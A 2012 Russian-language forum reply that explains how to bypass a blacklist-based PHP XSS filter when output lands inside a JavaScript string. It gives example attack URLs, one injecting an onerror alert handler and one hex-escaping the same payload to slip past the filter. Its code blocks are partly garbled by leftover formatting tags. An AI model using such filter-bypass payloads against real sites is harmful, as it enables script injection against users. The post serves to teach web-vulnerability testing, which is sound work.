Ваши вопросы по уязвимостям.

#11

26.06.2012, 05:35

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

С нами: 11322426

Репутация: 0

Цитата:

Сообщение от RazyKK

можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
$replace = array("");

Зависит от того, где будет вывод кода на странице.

В этом примере твоя фильтрация не поможет:

PHP код:


		
			
[COLOR="#000000"]...

...

document.write('[/COLOR].gif" />');

...

...[/COLOR]

Вектор атаки мог выглядеть так:

http://site.com/show.php?user_id="onerror="alert('XSS');//

Результат:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]'[/COLOR][/COLOR]

Из-за фильтра это сделать не получится. Но так как вывод в данном случае внутри строки JS, мы можем использовать escape-последовательности \x или \u для обхода фильтра:

http://site.com/show.php?user_id=\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x 65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x2F\x2F

P.S.: Это не просто просто пример, придуманный мной. Подобный код встречается в крупнейших почтовых сервисах и соц.сетях.